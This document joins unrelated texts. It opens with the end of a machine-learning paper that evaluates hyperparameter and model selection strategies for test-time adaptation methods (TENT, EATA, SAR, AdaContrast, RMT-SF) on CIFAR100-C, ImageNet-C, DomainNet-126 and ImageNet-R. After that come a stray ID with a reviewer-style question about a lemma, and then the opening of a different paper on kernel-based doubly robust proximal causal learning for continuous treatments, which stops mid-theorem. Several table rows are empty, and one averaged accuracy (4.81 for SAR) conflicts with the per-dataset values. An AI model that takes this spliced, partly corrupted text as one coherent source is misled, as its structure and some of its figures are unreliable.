advantage over other methods, which were developed with the motivation of not using a memory buffer during training. Thus, we experiment with RMT source-free variant which we denote as RMT-SF. It was shown in the original paper to also work well. 4.3 Experimental Setup Hyper-parameters. For each of the algorithms we perform a search over the two most important hyperparameters, that is: the learning rate (4 configurations) and momentum (using a value of 0.9 and not using momentum at all), similar to Boudiaf et al. (2022). This gives 8 configurations per model. For SAR and EATA we additionally search over the method-specific parameters using random search, which gives 8 additional configurations per those methods. Details about the hyper-parameters are given in the Appendix (sec. A). Each experiment is repeated 3 times. In total, we performed 1500 adaptation sessions. All models are compared against the SOURCE model, which assumes no adaptation at all. Implementation details. For CIFAR100-to-CIFAR100-C following the RobustBench benchmark (Croce et al., 2021) ResNeXt-29 (Xie et al., 2017) architecture is used. For remaining datasets, a source pre-trained ResNet-50 is used similar to Döbler et al. (2023). As for the optimizer we use SGD for all the methods. For the choice of batch size, we are the most interested in the online setting, that is batch size equal one. However, some methods do not work well in the single-image adaptation setting. As such, we use batch size equal to ten, which was shown in other works to work still well (Niu et al., 2023). A batch size equal to ten is also commonly used in the continual learning for online scenarios (ouli, 2022). Test-time augmentations. Some of the TTA methods use data augmentation at test-time (Wang et al., 2022; Sun et al., 2020), including AdaContrast and RMT considered in this paper. Those augmentations include some of those that were used to generate ImageNet-C and CIFAR100-C benchmarks (details in the Appendix). We treat those augmentations as part of the method as they are needed to compute consistency loss, however, it is important to note that those augmentations can give an advantage for those methods on the first two benchmarks. In general, knowledge of a distortion type that can occur at test time can be beneficial and could be used when designing a TTA method. 5 Results In Table 2, we show the results of hyperparameter selection under different selection strategies. In Fig. 1, we plot correlations between surrogate metrics and target accuracy. Further, we increase the difficulty of the testing conditions by increasing the length of testing scenarios in Table 4 and by varying the class correlation level of the test samples in Fig. 3. Finally, we extend our testing scenario to the model selection strategy in Table 3 to show the performance of surrogate metrics when selecting across different TTA methods. Varying gap between surrogate-based hyper-parameter selection and oracle selection. The gap varies between different methods. For example, for the EATA method when using a source selection strategy the gap varies from 0.66% on CIFAR100-C to 7.11% on ImageNet-C (which accounts for 24.62% of the relative gap). On the contrary, for the AdaContrast method using source accuracy for model selection allowed to match the oracle selection strategy on all of the datasets. Different methods ranking under different evaluation strategies. While EATA is significantly the best under the oracle selection strategy (49.99 on average) it is outperformed for example by Tent Table 2: Final accuracy of evaluated test-time adaptation methods under different model selection strategies. **Green** color marks the best surrogate strategy for each of the methods, and the **red** color marks the worst one. The last section aggregates the results over the 4 datasets, here we rank each of the TTA methods within each of the selection strategies. **Bolded** text marks the best one, and the underline marks the second best method. | Dataset | Method | S-ACC | CROSS-ACC | ENT | CON | 100-RND | MEDIAN | ORACLE | |---------------|-----------------|---------|-----------|--------|--------|---------|--------|--------| | CIFAR100-C | SOURCE | | | | | | | | | | TENT | 59.93±0.15 | 59.56±0.2 | 5.32±0.05 | 59.56±0.20 | 59.17±0.41 | 54.46±0.51 | 60.16±0.14 | | | EATA | 61.78±0.40 | 61.86±0.47 | 21.01±20.12 | 58.60±4.71 | 61.95±0.57 | 60.51±0.36 | 62.44±0.35 | | | SAR | 59.47±0.11 | 45.65±5.83 | 11.68±5.92 | 48.75±0.21 | 59.26±0.2 | 57.03±0.27 | 60.01±0.12 | | | ADACONTRAST | 64.43±0.01 | 63.70±0.11 | 63.69±0.11 | 37.97±0.43 | 64.43±0.01 | 48.48±0.56 | 64.43±0.01 | | | LAME | | | | | | | | | | RMT-SF | 59.22±0.13 | 60.04±0.1 | 60.17±0.07 | 60.17±0.07 | 59.93±0.13 | 60.06±0.12 | 60.33±0.11 | | IMAGENet-C | SOURCE | | | | | | | | | | TENT | 27.98±0.07 | 31.08±0.06 | 1.52±0.1 | 29.79±0.16 | 30.29±0.76 | 28.83±0.03 | 31.37±0.03 | | | EATA | 28.87±0.11 | 14.60±12.38 | 1.96±2.28 | 23.39±16.54 | 32.25±0.99 | 18.74±8.45 | 35.98±1.02 | | | SAR | 27.14±0.09 | 28.72±0.11 | 8.41±4.6 | 31.19±0.22 | 30.93±0.35 | 29.30±0.45 | 31.30±0.08 | | | ADACONTRAST | 33.29±0.09 | 31.81±0.14 | 33.29±0.09 | 3.90±0.26 | 31.81±2.01 | 18.94±0.13 | 33.28±0.09 | | | LAME | | | | | | | | | | RMT-SF | 28.81±0.05 | 27.54±2.6 | 23.76±0.1 | 23.76±0.1 | 30.51±0.1 | 29.16±0.13 | 31.54±0.15 | | DOMAINNet-126 | SOURCE | | | | | | | | | | TENT | 49.92±0.08 | 52.13±0.06 | 8.21±0.11 | 52.13±0.06 | 52.04±0.19 | 50.32±0.08 | 52.44±0.01 | | | EATA | 50.17±0.06 | 53.37±0.92 | 19.76±23.79 | 53.39±0.95 | 53.30±0.54 | 51.88±0.19 | 54.44±0.27 | | | SAR | 49.73±0.09 | 50.91±1.15 | 28.48±5.55 | 51.24±0.19 | 51.45±0.44 | 50.55±0.31 | 52.75±0.07 | | | ADACONTRAST | 56.51±0.04 | 55.69±0.15 | 46.50±0.42 | 19.61±0.79 | 54.32±3.11 | 51.00±0.79 | 56.51±0.04 | | | LAME | | | | | | | | | | RMT-SF | 51.02±0.05 | 52.67±0.02 | 46.36±0.64 | 46.36±0.64 | 52.40±0.20 | 52.42±0.11 | 52.70±0.01 | | IMAGENet-R | SOURCE | | | | | | | | | | TENT | 37.43±0.28 | 38.92±0.07 | 11.01±0.59 | 38.30±0.17 | 38.40±0.13 | 37.55±0.14 | 38.92±0.07 | | | EATA | 37.17±0.13 | 43.19±0.75 | 2.35±1.46 | 42.27±0.18 | 42.03±0.43 | 39.70±0.83 | 43.09±0.76 | | | SAR | 37.09±0.73 | 41.94±0.24 | 24.28±0.71 | 41.94±0.23 | 41.31±1.06 | 37.84±0.17 | 41.94±0.24 | | | ADACONTRAST | 39.23±0.12 | 39.53±0.14 | 37.94±0.26 | 37.94±0.26 | 38.86±0.78 | 35.80±0.18 | 39.53±0.14 | | | LAME | | | | | | | | | | RMT-SF | 36.81±0.16 | 40.97±0.32 | 40.97±0.32 | 40.97±0.32 | 40.64±0.78 | 38.77±0.10 | 40.97±0.32 | | AVERAGE | TENT | 43.81±(4) | 45.42±(2) | 6.51±(6) | 44.95±(1) | 44.98±(5) | 42.79±(3) | 45.67±(5) | | | EATA | 44.50±(2) | 43.13±(4) | 11.27±(5) | 44.47±(2) | 47.38±(1) | 42.71±(4) | 49.99±(1) | | | SAR | 43.36±(5) | 4.81±(5) | 16.22±(4) | 43.28±(3) | 45.74±(4) | 43.68±(2) | 46.50±(3) | | | ADACONTRAST | 48.37±(1) | 47.68±(1) | 45.36±(1) | 19.12±(6) | 47.36±(2) | 38.56±(6) | 48.44±(2) | | | LAME | 40.26±(6) | 40.26±(6) | 40.26±(3) | 40.26±(5) | 40.26±(6) | 40.26±(5) | 40.26±(6) | | | RMT-SF | 43.96±(3) | 45.31±(3) | 42.82±(2) | 42.82±(4) | 45.87±(3) | 45.10±(1) | 46.39±(4) | Table 3: Target accuracy for different model selection strategies when selecting from a pool of all trained models (57 models in total). When selecting the checkpoint across different methods, the model selection is more difficult and the gap between oracle and other selection methods increases. Using the source-accuracy strategy resulted in a very conservative model selection of models that did not adapt much. (5th method using oracle selection) when using 3 out of 4 surrogate-based metrics. Notably, TENT achieves the 2nd best score across all methods when using surrogate-based metrics (mean accuracy of 45.42). AdaContrast is clearly the best method when using surrogate-based metrics scoring as the 1st method on all metrics except for consistency loss. On usage of metrics that were part of the training. Using entropy to drive model selection performs poorly if it is one of the main training objectives (SAR, TENT, EATA). This seems intuitive as optimizing for the entropy using pseudo-labels might lead to degenerate solutions, e.g., consistently predicting only one class with high confidence. This also holds true for the consistency loss and the AdaContrast method. We take a closer look at this phenomenon and see that initially optimizing entropy leads to better selection results (Fig. 1 first row and column). Nevertheless, once a certain threshold is reached, the model’s generated solutions gradually deteriorate in quality. We could select a “reasonable” range of entropy by computing it on the source dataset, but this would still need tuning the parameters, which is something we wanted to avoid. Interestingly, for the RMT method which uses a multi-task loss combined with access to the source prototypes, model selection using entropy or consistency works reasonably well, usually a few percent behind other surrogate-based selection strategies. No single best surrogate metric. Our results show that there is no surrogate metric that consistently selects the best model on all of the datasets and methods (Fig. 2). The two most promising strategies are based on source accuracy and using a cross-validation selection mechanism. However, there are some exceptions. For example, EATA scored 14.60 on the ImageNet-C benchmark (compared to the 35.98 of oracle selection) using the CROSS-ACC strategy. This might be due to the fact of the rather large number of hyperparameters of the EATA method and changes in dataset characteristics. Using source accuracy for the selection mechanism produces stable results, but is often far from optimal. For example, for the TENT method, using source accuracy for the selection strategy generates results that are better only from the entropy selection method (see Table 5 for ranking of selection strategies). One potential caveat of using a source-accuracy selection strategy is that it may result in “conservative” model selection, that is models that do not change much from the source model. Gap significantly increases when selecting across different methods. When performing model selection across a pool of all trained models (across different methods), Table 5, the gap significantly increases. Notably, when selecting the model based on the source accuracy in all of the cases the LAME method was selected as it is a conservative method that does not change much its outputs. As a result, using this strategy an accuracy of 17.7 was achieved on ImageNet-C benchmark, compared to the 35.98 of oracle selection. This shows that each of the surrogate-based strategies has its own limitations, and probably should not be used in isolation. Limited access to the target labels helps a lot. As shown in the results in Table 2, having access to just one hundred target labels helps to consistently improve over the other surrogate-based model selection strategies. In most of the cases, this strategy results in selecting hyper-parameters that are within 1% of accuracy compared to the oracle selection. Figure 1: Correlation plots for the EATA (upper row) and AdaContrast (bottom row) method between target accuracy (y-axis) and selected surrogate measures (x-axes). **EATA**: (Left) Selecting the model based on the entropy loss works up to some point, after which minimizing the entropy leads to degenerate solutions with small accuracy. However, there is a smooth transition between favorable to unfavorable solutions exists and it requires manual threshold selection. (Center) Selecting the model based on the consistency loss leads to solutions close to the optimal, however, the margin between viable and suboptimal solutions is rather small. (Right) Selecting the model based on the source accuracy leads to selecting fairly good solutions and it clearly isolates degenerated models. **AdaContrast**: Contrary to the EATA, entropy-based model selection works quite well, and the consistency-based selection produced degenerated solutions. Using source data to measure accuracy allows for optimal model selection. Figure 2: Target accuracy per selection strategy for different datasets, results aggregate all evaluated test-time adaptation methods. Using test labels (Oracle and 100-md) performs consistently the best. Using the Cross-Acc strategy works really well on ImageNet-R, but not so well on other datasets with evident outliers. The horizontal line separates selection strategies that use target labels. Figure 3: CIFAR100-C results: the effect of Dirichlet concentration parameter $\delta$ on the model performance for different methods and selection strategies. Even if the surrogate-based metrics match oracle accuracy in the base scenario (uniform class distribution) they may fall short when the temporal correlation is changed. TTA remains very challenging. In Table 4 we presents results for the Long ImageNet-C scenario. Here, when using cross-acc metric we have used oracle parameters obtained on the original ImageNet-C scenario. We show that it performed poorly for 2 out of 4 evaluated methods (TENT and SAR). This shows that the optimal parameters depend on the length of the sequence (with some methods being robust to such changes). What’s more, in Fig. 3 we controlled for the temporal classes correlation. As presented in the figures the difference between surrogate-based model selection and oracle one increases for some of the selection strategies as we increase task difficulty. Performance of TTA methods. In our experiments we use two very popular benchmarks for TTA (CIFAR100-C and ImageNet-C) and two less popular ones (DomainNet-126 and ImageNet-R). As expected, all the methods easily beat the source model in the first two settings. However, when testing on ImageNet-R most of the methods improve over the source model but with a minor margin, and on DomainNet-126 AdaContrast method is the only one that does not degrade the performance. The lack of success on the last two datasets is due to the fact that they are not commonly used and we apply a small batch size (RMT method also showed its performance when using batch size = 1, but they have used exemplars in that setting). This overall underscores the fact that the TTA remains challenging, with questionable transferability to novel testing conditions. 6 DISCUSSION Offline vs. online selection strategy. In this work, we have considered an offline model selection strategy, that is we run adaptation using multiple models and select the best model afterward using some measures. In TTA one would ideally select the parameters on the fly by adjusting to the testing conditions. Nevertheless, evaluating whether existing surrogate measures can serve the purpose of estimating model performance on target data is the first step in that direction. On consistency of stability of surrogate-measures. In general, we have found that existing surrogate-based metric, after removing the outliers (so for example discarding entropy-based se- | Dataset | Method | S-ACC | Cross-ACC | ENT | CON | Median | Oracle | |---------------|--------|-----------|-----------|----------|----------|----------|----------| | ImageNet-C Long | TENT | 29.20±1.8 | 25.62±8.11| 0.65±0.56| 30.51±0.86| 22.70±5.3| 31.48±0.17| | | EATA | 30.23±1.99| 34.64±0.54| 0.41±0.3 | 22.49±15.82| 18.81±6.88| 35.2±0.41 | | | SAR | 28.57±1.19| 25.35±4.17| 10.34±9.13| 25.78±3.55| 29.44±0.65| 32.18±1.43| | | RMT-SF | 28.79±0.06| 31.53±0.15| 25.48±0.23| 25.48±0.23| 29.56±0.19| 31.52±0.15| Table 4: Target accuracy for different hyper-parameter selection strategies when selecting for a Long ImageNet-C scenario. Using oracle parameters from standard ImageNet-C benchmark (Cross-Acc strategy) performs poorly for SAR and EATA. Also, greater variance in results can be observed. lection for SAR, EATA, TENT methods), works reasonably well, usually within a few percent of accuracy to the oracle selection, on average. However, all the metrics lack the required stability, and for each of those we have identified at least one scenario when it worked very poorly. Need for more real-world benchmarks. Despite the best efforts the benchmark proposed here (and in other works) is only a very simplified version of real-world challenges and the conclusions drawn from this research should be applied very carefully to the real world. In particular, we envision that the challenge of using TTA methods over very long (potentially infinitely long) adaptation phases still requires much more research in this direction. 7 CONCLUSIONS In this work we evaluated existing test-time adaptation methods on a diverse array of benchmarks using practical model selection strategies, that is without accessing target labels. Throughout the experiments, we found numerous findings. We showed that the accuracy of model selection strategies strongly varies across datasets and adaptation methods and out of all evaluated approaches, only the AdaContrast method allows for surrogate-based model selection that matches oracle selection performance. Finally, we showed the limitations of the current surrogate-based metric, which are all inferior to a strategy of using a tiny set of labeled test samples. The study has important implications from a practical point of view and shows the importance of the model selection problem in TTA, which we believe did not receive enough attention from the community. In the experiments, we used various datasets, as well as we controlled for the length of testing sequences and their correlation ratio, imitating real-world conditions. Yet, those provide only a simplification of challenges occurring in the real world and therefore we believe that more work is required in the construction of relevant TTA benchmarks. However, we believe that our work is an important step toward harnessing the potential of TTA methods. Reproducibility statement. We provided all the necessary information required to repeat the experiments. In Sec 4(main paper) and Sec.A(Appendix), we refer to the repository we have used to provide all the implementation details, hyper-parameter configurations etc., and the code itself. We will open-source our code upon acceptance. REFERENCES Online continual learning in image classification: An empirical survey. *Neurocomputing*, 469:28–51, 2022. Malik Boudiaf, Romain Müller, Ismail Ben Ayed, and Luca Bertinetto. Parameter-free online test-time adaptation. In *CVPR*, pp. 8334–8343, 2022. Dian Chen, Dequan Wang, Trevor Darrell, and Sayna Ebrahimi. Contrastive test-time adaptation. In *CVPR*, 2022. Francesco Croce, Maksym Andriushchenko, Vikash Sehwag, Edoardo Debenedetti, Nicolas Flammarion, Mung Chiang, Prateek Mittal, and Matthias Hein. Robustbench: a standardized adversarial robustness benchmark. In *Thirty-fifth Conference on Neural Information Processing Systems Datasets and Benchmarks Track*, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Mario Döbler, Robert A. Marsden, and Bin Yang. Robust mean teacher for continual and gradual test-time adaptation, 2023. Yaroslav Ganin and Victor S. Lempitsky. Unsupervised domain adaptation by backpropagation. In *ICML*, 2015. Taesik Gong, Jongheon Jeong, Taewon Kim, Yewon Kim, Jinwoo Shin, and Sung-Ju Lee. NOTE: Robust continual test-time adaptation against temporal correlation. In *Advances in Neural Information Processing Systems (NeurIPS)*, 2022. Mononito Goswami, Cristian I. Challu, Laurent Callot, Lenon Minorics, and Andrey Kan. Unsupervised model selection for time series anomaly detection. In *ICLR*, 2023. Ishaan Gulrajani and David Lopez-Paz. In search of lost domain generalization. In *ICLR*, 2021. Kaiming He, Haoqi Fan, Yuxin Wu, Saining Xie, and Ross Girshick. Momentum contrast for unsupervised visual representation learning. In *CVPR*, 2020. Dan Hendrycks and Thomas Dietterich. Benchmarking neural network robustness to common corruptions and perturbations. *Proceedings of the International Conference on Learning Representations*, 2019. Dan Hendrycks, Steven Basart, Norman Mu, Saurav Kadavath, Frank Wang, Evan Dorundo, Rahul Desai, Tyler Zhu, Samyak Parajuli, Mike Guo, Dawn Song, Jacob Steinhardt, and Justin Gilmer. The many faces of robustness: A critical analysis of out-of-distribution generalization. *ICCV*, 2021. Alex Krizhevsky. Learning multiple layers of features from tiny images. pp. 32–33, 2009. URL [https://www.cs.toronto.edu/~kriz/learning-features-2009-TR.pdf](https://www.cs.toronto.edu/~kriz/learning-features-2009-TR.pdf). Jian Liang, Dapeng Hu, and Jiashi Feng. Do we really need to access the source data? Source hypothesis transfer for unsupervised domain adaptation. In *ICML*, 2020. John Miller, Rohan Taori, Aditi Raghunathan, Shiori Sagawa, Pang Wei Koh, Vaishaal Shankar, Percy Liang, Yair Carmon, and Ludwig Schmidt. Accuracy on the line: On the strong correlation between out-of-distribution and in-distribution generalization. 2021. A. Tuan Nguyen, Thanh Nguyen-Tang, Ser-Nam Lim, and Philip H.S. Torr. Tipi: Test time adaptation with transformation invariance. In *CVPR*, pp. 24162–24171, 2023. Shuaicheng Niu, Jiaxiang Wu, Yifan Zhang, Yaofu Chen, Shijian Zheng, Peilin Zhao, and Mingkui Tan. Efficient test-time model adaptation without forgetting. In *ICML*, 2022.
TjGJFkU3xL
I understand that $q_0$ represents the maximum value for the equation in Lemma 5.1. However, I am unsure about the connection between Lemma 5.1 and Equation (8). In other words, why do we need to minimize the empirical quantity for the equation in Lemma 5.1?
Doubly Robust Proximal Causal Learning for Continuous Treatments Yong Wu\textsuperscript{1,3,4,5} Yanwei Fu\textsuperscript{2} Shouyan Wang\textsuperscript{1,3,4,5,6,7} Xinwei Sun\textsuperscript{2*} \textsuperscript{1}Institute of Science and Technology for Brain-Inspired Intelligence, Fudan University \textsuperscript{2}School of Data Science, Fudan University \textsuperscript{3}Zhangjiang Fudan International Innovation Center \textsuperscript{4}Key Laboratory of Computational Neuroscience and Brain-Inspired Intelligence (Fudan University) \textsuperscript{5}MOE Frontiers Center for Brain Science, Fudan University \textsuperscript{6}Shanghai Engineering Research Center of AI & Robotics, Fudan University \textsuperscript{7}Engineering Research Center of AI & Robotics, Ministry of Education, Fudan University Abstract Proximal causal learning is a powerful framework for identifying the causal effect under the existence of unmeasured confounders. Within this framework, the doubly robust (DR) estimator was derived and has shown its effectiveness in estimation, especially when the model assumption is violated. However, the current form of the DR estimator is restricted to binary treatments, while the treatments can be continuous in many real-world applications. The primary obstacle to continuous treatments resides in the delta function present in the original DR estimator, making it infeasible in causal effect estimation and introducing a heavy computational burden in nuisance function estimation. To address these challenges, we propose a kernel-based DR estimator that can well handle continuous treatments for proximal causal learning. Equipped with its smoothness, we show that its oracle form is a consistent approximation of the influence function. Further, we propose a new approach to efficiently solve the nuisance functions. We then provide a comprehensive convergence analysis in terms of the mean square error. We demonstrate the utility of our estimator on synthetic datasets and real-world applications. 1 Introduction The causal effect estimation is a significant issue in many fields such as social sciences \cite{Hedström&Ylikoski2010}, economics \cite{Varian2016}, and medicine \cite{Yazdani&Boerwinkle2015}. A critical challenge in causal inference is non-compliance to randomness due to the presence of unobserved confounders, which can induce biases in the estimation. One approach to address this challenge is the proximal causal learning (PCL) framework \cite{Miao et al.2018a,Tchetgen et al.2020,Cui et al.2023}, which offers an opportunity to learn about causal effects where ignorability condition fails. This framework employs two proxies - a treatment-inducing proxy and an outcome-inducing proxy - to identify the causal effect by estimating the bridge/nuisance functions. Particularly, \cite{Cui et al.2023} derived the doubly robust estimator within the PCL framework, which combines the estimator obtained from the treatment bridge function and the estimator obtained from the outcome bridge function. The doubly robust estimator has been widely used in causal effect estimation \cite{Bang&Robins2005}, as it is able to tolerate violations of model assumptions of bridge functions. However, current doubly robust estimators \cite{Cui et al.2023} within the proximal causal framework mainly focus on binary treatments, whereas the treatments can be continuous in many real-world scenarios, including social science, biology, and economics. For example, in therapy studies, we are not only interested in estimating the effect of receiving the drug but also the effectiveness of the drug dose. Another example comes from the data \cite{Donohue III&Levitt2001} that focused on policy-making, where one wishes to estimate the effect of legalized abortion on the crime rate. *Corresponding author \footnote{Code is available at \url{https://github.com/yezichu/PCL_Continuous_Treatment}} Previous work on causal effect for continuous treatments has focused primarily on the unconfoundedness assumption (Kallus & Zhou [2018], Colangelo & Lee [2020]). However, extending them within the proximal causal framework encounters several key challenges. Firstly, the Proximal Inverse Probability Weighting (PIPW) part in the original doubly robust (DR) estimator relies on a delta function centered around the treatment value being analyzed, rendering it impractical for empirically estimating causal effects with continuous treatments. Secondly, deriving the influence function will involve dealing with the Gateaux derivative of bridge functions, which is particularly intricate due to its implicit nature. Lastly, the existing estimation process of bridge functions requires running an optimization for each new treatment, rendering it computationally inefficient for practical applications. In light of these formidable challenges, our contribution lies in addressing the open question of deriving the DR estimator for continuous treatments within the proximal causal framework. To address these challenges, we propose a kernel-based method that can well handle continuous treatments for PCL. Specifically, we incorporate the kernel function into the PIPW estimator, as a smooth approximation to causal effect. We then derive the DR estimator and show its consistency for a broad family of kernel functions. Equipped with smoothness, we show that such a DR estimator coincides with the influence function. To overcome the computational issue in nuisance function estimation, we propose to estimate the propensity score and incorporate it into a min-max optimization problem, which is sufficient to estimate the nuisance functions for all treatments. We show that our estimator enjoys the $O(n^{-4/5})$ convergence rate in mean squared error (MSE). We demonstrate the utility and efficiency on synthetic data and the policy-making (Donohue III & Levitt [2001]). Contributions. To summarize, our contributions are: 1. We propose a kernel-based DR estimator that is provable to be consistent for continuous treatments effect within the proximal causal framework. 2. We efficiently solve bridge functions for all treatments with only a single optimization. 3. We present the convergence analysis of our estimator in terms of MSE. 4. We demonstrated the utility of our estimator on two synthetic data and real data. 2 BACKGROUND Proximal Causal Learning. The proximal causal learning (PCL) can be dated back to Kuroki & Pearl (2014), which established the identification of causal effects in the presence of unobserved confounders under linear models. Then Miao et al. (2018a,b) and its extensions (Shi et al., 2020; Tchetgen et al., 2020) proposed to leverage two proxy variables for causal identification by estimating the outcome bridge function. Building upon this foundation, Cui et al. (2023) introduced a treatment bridge function and incorporated it into the Proximal Inverse Probability Weighting (PIPW) estimator. Besides, under binary treatments, they derived the Proximal Doubly Robust (PDR) estimator via influence functions. However, continuous treatments pose a challenge as the treatment effect is not pathwise differentiable with respect to them, preventing the derivation of a DR estimator. In this paper, we employ the kernel method that is provable to be consistent in treatment effect estimation. We further show that the kernel-based DR estimator can be derived from influence functions. Causal inference for Continuous Treatments. The most common approaches for estimating continuous treatment effects are regression-based models (Imbens [2004], Hill [2011]), generalized propensity score-based models (Imbens [2000], Hirano & Imbens [2004], Imai & Van Dyk [2004]), and entropy balance-based methods (Hainmueller [2012], Imai & Ratkovic [2014], Tübbicke [2021]). Furthermore, Kennedy et al. (2017); Kallus & Zhou (2018) and Colangelo & Lee (2020) extended the DR estimation to continuous treatments by combining regression-based models and the generalized propensity score-based models. However, it remains open to derive the DR estimator for continuous treatments within the proximal causal framework. In this paper, we fill in this blank with a new kernel-based DR estimator that is provable to derive from influence function. Nuisance Parameters Estimation. In proximal causal learning, one should estimate nuisance parameters to obtain the causal effect. Many methods have been proposed for this goal (Tchetgen et al., 2020; Singh [2020], Xu et al., 2021; Kompa et al., 2022), but they primarily focus on the estimation of the outcome bridge function. Recently, Kallus et al. (2021); Ghassami et al. (2022) have provided non-parametric estimates of treatment bridge function, but they are restricted to binary treatments. When it comes to continuous treatments, existing methods can be computationally inefficient since it has to resolve an optimization problem for each treatment. In this paper, we propose a new method that can efficiently solve bridge functions for all treatments with only a single optimization. 3 PROXIMAL CAUSAL INFERENCE Problem setup. We consider estimating the Average Causal Effect (ACE) of a continuous treatment $A$ on an outcome $Y$: $\mathbb{E}[Y(a)]$, where $Y(a)$ for any $a \in \text{supp}(A)$ denotes the potential outcome when the treatment $A = a$ is received. We respectively denote $X$ and $U$ as observed covariates and unobserved confounders. To estimate $\mathbb{E}[Y(a)]$, we assume the following consistency assumptions that are widely adopted in causal inference (Peters et al., 2017): Assumption 3.1 (Consistency and Positivity). We assume (i) $Y(A) = Y$ almost surely (a.s.); and (ii) $0 < p(A = a | U = u, X = x) < 1$ a.s. Assumption 3.2 (Latent ignorability). We assume $Y(a) \perp A | U, X$. Assump. 3.2 means that the strong ignorability condition may fail due to the presence of unobserved confounder $U$. To account for such a confounding bias, the proximal causal learning incorporates a treatment-inducing proxy $Z$ and an outcome-inducing proxy $W$. As illustrated in Fig. 1, these proxies should satisfy the following conditional independence: Assumption 3.3 (Conditional Independence of Proxies). The treatment-inducing proxy $Z$ and the outcome-inducing proxy $W$ satisfy the following conditional independence: (i) $Y \perp Z | A, U, X$; and (ii) $W \perp (A, Z) | U, X$. Equipped with such conditional independence, previous work by Miao et al. (2018a), Cui et al. (2023) demonstrated that we can express the causal effect, denoted as $\beta(a)$, as follows: $$\mathbb{E}[Y(a)] = \mathbb{E}[h_0(a, W, X)] = \mathbb{E}[\mathbb{I}(A = a)q_0(a, Z, X)Y],$$ where $h_0$ and $q_0$ are two nuisance/bridge functions such that the following equations hold: $$R_h(h_0; y) := \mathbb{E}[Y - h_0(A, W, X)|A, Z, X] = 0,$$ $$R_q(q_0; p) := \mathbb{E}[q_0(A, Z, X) - 1/p(A|W, X)|A, W, X] = 0.$$ To ensure the existence and uniqueness of solutions to the above equations, we additionally assume that (Miao et al., 2018a; Tchetgen et al., 2020; Cui et al., 2023): Assumption 3.4. Let $\nu$ denote any square-integrable function. For any $(a, x)$, we have 1. (Completeness for outcome bridge functions). We assume that $\mathbb{E}[\nu(U)|W, a, x] = 0$ and $\mathbb{E}[\nu(Z)|W, a, x] = 0$ iff $\nu(U) = 0$ almost surely. 2. (Completeness for treatment bridge functions). We assume that $\mathbb{E}[\nu(U)|Z, a, x] = 0$ and $\mathbb{E}[\nu(W)|Z, a, x] = 0$ iff $\nu(U) = 0$ almost surely. Under assump. 3.4, we can solve $h_0$ and $q_0$ via several optimization approaches derived from conditional moment equations, including two-stage penalized regression (Singh, 2020; Mastouri et al., 2021; Xu et al., 2021), maximum moment restriction (Zhang et al., 2020; Muandet et al., 2020a), and minimax optimization (Dikkala et al., 2020; Muandet et al., 2020b; Kallus et al., 2021). With solved $h_0, q_0$, we can estimate $\mathbb{E}[Y(a)]$ via: $$\mathbb{E}_n[Y(a)] = \frac{1}{n} \sum_{i=1}^{n} h_0(a_i, w_i, x_i), \quad \text{or} \quad \mathbb{E}_n[Y(a)] = \frac{1}{n} \sum_{i=1}^{n} \mathbb{I}(a_i = a)q_0(a_i, z_i, x_i)y_i.$$ Furthermore, Cui et al. (2023) proposes a doubly robust estimator to improve robustness against misspecification of bridge functions. $$\mathbb{E}[Y(a)] = \mathbb{E}[\mathbb{I}(A = a)q_0(a, Z, X)(Y - h_0(a, W, X)) + h_0(a, W, X)],$$ $$\approx \frac{1}{n} \sum_{i=1}^{n} (\mathbb{I}(A = a)q_0(a, z_i, x_i)(y_i - h_0(a, w_i, x_i)) + h_0(a, w_i, x_i)).$$ Although this proximal learning method can efficiently estimate \( \mathbb{E}[Y(a)] \) for binary treatments, it suffers from several problems when it comes to continuous treatments. First, for any \( a \in \text{supp}(A) \), it almost surely holds that there does not exist any sample \( i \) that satisfies \( a_i = a \) for \( i = 1, ..., n \), making Eq. 5 infeasible. Besides, it is challenging to derive the influence function for continuous treatments as it involves the derivative computation for implicit functions \( h_0 \) and \( q_0 \). Lastly, to estimate \( q_0 \), previous methods suffered from a large computational cost since they had to re-run the optimization algorithm for each new treatment, making it inapplicable in real-world applications. To resolve these problems for continuous treatment, we first introduce a kernel-based method in Sec. 4, which can estimate \( \mathbb{E}[Y(a)] \) in a feasible way. Then in Sec. 5, we introduce a new optimization algorithm that can estimate \( h_0, q_0 \) for all treatments with a single optimization algorithm. Finally, we present the theoretical results in Sec. 6. 4 PROXIMAL CONTINUOUS ESTIMATION In this section, we introduce a kernel-based doubly robust estimator for \( \beta(a) := \mathbb{E}[Y(a)] \) with continuous treatments. We first present the estimator form in Sec. 4.1 followed by Sec. 4.2 to show that such an estimator can well approximate the influence function for \( \beta(a) \). 4.1 KERNEL-BASED PROXIMAL ESTIMATION As mentioned above, the main challenge for continuous treatments lies in the estimation infeasibility caused by the indicator function in the proximal inverse probability weighted estimator (PIPW) with \( q_0 \): \[ \hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} I(a_i = a) q_0(a, z_i, x_i) y_i. \] To resolve this problem, we note that the indicator function can be viewed as a Dirac delta function \( \delta_a(a_i) \). The average of this Dirac delta function over \( n \) samples \( \frac{1}{n} \sum_{i=1}^{n} \delta_a(a_i) \) approximates to the marginal probability \( P(a) \) [Doucet et al., 2009], which equals to 0 when \( A \) is continuous. To address this problem, we integrate the kernel function \( K(A - a) \) that can alleviate the unit concentration of the Dirac delta function. We can then rewrite the PIPW estimator as follows, dubbed as Proximal Kernel Inverse Probability Weighted (PKIPW) estimator: \[ \hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} K_{h_{bw}}(a_i - a) q_0(a, z_i, x_i) y_i, \] where \( h_{bw} > 0 \) is the bandwidth such that \( K_{h_{bw}}(a_i - a) = \frac{1}{h_{bw}} K \left( \frac{a_i - a}{h_{bw}} \right) \). The kernel function \( K_{h_{bw}}(A - a) \) that has been widely adopted in density estimation, assigns a non-zero weight to each sample, thus making it feasible to estimate \( \beta(a) \). To demonstrate its validity, we next show that it can approximate \( \beta(a) \) well. This result requires that the kernel function \( K \) is bounded differentiable, as formally stated in the following. Assumption 4.1. The second-order symmetric kernel function \( K(\cdot) \) is bounded differentiable, i.e., \[ \int k(u) du = 1, \int u k(u) du = 0, \kappa_2(K) = \int u^2 k(u) du < \infty. \] We define \( \Omega_2^{(i)}(K) = \int (k^{(i)}(u))^2 du \). Assump. 4.1 adheres to the conventional norms within the domain of nonparametric kernel estimation and maintains its validity across widely adopted kernel functions, including but not limited to the Epanechnikov and Gaussian kernels. Under assum. 4.1 we have the following theorem: Theorem 4.2. Under assum. 4.1 